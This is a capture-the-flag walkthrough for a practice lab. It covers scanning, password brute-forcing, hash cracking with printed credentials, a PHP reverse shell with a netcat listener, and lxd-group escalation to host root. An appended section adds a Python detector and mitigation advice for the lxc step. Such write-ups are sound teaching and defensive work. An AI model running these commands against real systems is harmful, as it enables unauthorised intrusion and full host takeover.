HA Joker CTF
Room Link: https://tryhackme.com/room/jokerctf
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/8080 - HTTP
Kali
hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 -f $VICTIM http-get /
Wasn't finding it, but should have found a backup.zip.
Kali
nikto -id joker:hannah -h $VICTIM:8080
Kali
zip2john backup.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt
unzip backup.zip
Password: hannah
Kali
cd db
cat joomladb.sql | grep adminHash
$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG
Kali
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Browser
Username: admin
Password: abcd1234

Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Kali
nc -lvnp 1234

Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo; fg
Victim
id
Kali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
Note: The command lxd init was used to resolve a storage pool area issue; it may not always be needed.
Victim
cd /tmp
wget http://$KALI:81/alpine-v3.13-x86_64-20210218_0139.tar.gz
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
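
Detection example (added here, not part of the original write-up): a small correlator that reads process command lines and alerts when the same container is created with security.privileged=true and then given a disk device whose source is the host root, which is the sequence in the Victim steps above. The (user, command line) record format and the names webuser, ops and web01 are constructed for illustration.

```python
import shlex

# Constructed sample records (user, command line), e.g. taken from auditd execve logs.
SAMPLE_EVENTS = [
    ("webuser", "lxc init myimage ignite -c security.privileged=true"),
    ("webuser", "lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true"),
    ("webuser", "lxc start ignite"),
    ("ops", "lxc launch ubuntu:22.04 web01"),
    ("ops", "lxc config device add web01 data disk source=/srv/data path=/data"),
]


def classify(cmdline):
    """Return (container, finding) for a risky lxc command line, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a log line
        return None
    if len(argv) < 4 or argv[0] != "lxc":
        return None
    if argv[1] in ("init", "launch") and any(a.endswith("security.privileged=true") for a in argv):
        # lxc init <image> <container> -c security.privileged=true
        names = [a for a in argv[2:] if not a.startswith("-") and "=" not in a]
        return (names[1] if len(names) > 1 else "?", "privileged")
    if argv[1:4] == ["config", "device", "add"] and "disk" in argv[4:]:
        # lxc config device add <container> <device> disk source=<host path> ...
        opts = dict(a.split("=", 1) for a in argv[4:] if "=" in a)
        src = opts.get("source", "")
        if src and src.strip("/") == "":  # source=/ exposes the whole host filesystem
            return (argv[4], "host_root_disk")
    return None


def detect(events):
    """Alert once per (user, container) that is both privileged and mounts host /."""
    state, alerts = {}, []
    for user, cmdline in events:
        hit = classify(cmdline)
        if hit:
            findings = state.setdefault(hit[0], set())
            findings.add(hit[1])
            if len(findings) == 2 and (user, hit[0]) not in alerts:
                alerts.append((user, hit[0]))
    return alerts


if __name__ == "__main__":
    for user, container in detect(SAMPLE_EVENTS):
        print(f"ALERT user={user} container={container}: privileged + host / mounted")
```

Membership of the lxd group is effectively root on the host, so the durable mitigation is to keep web and service accounts out of that group; the correlator is for hosts where lxc access cannot be removed.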
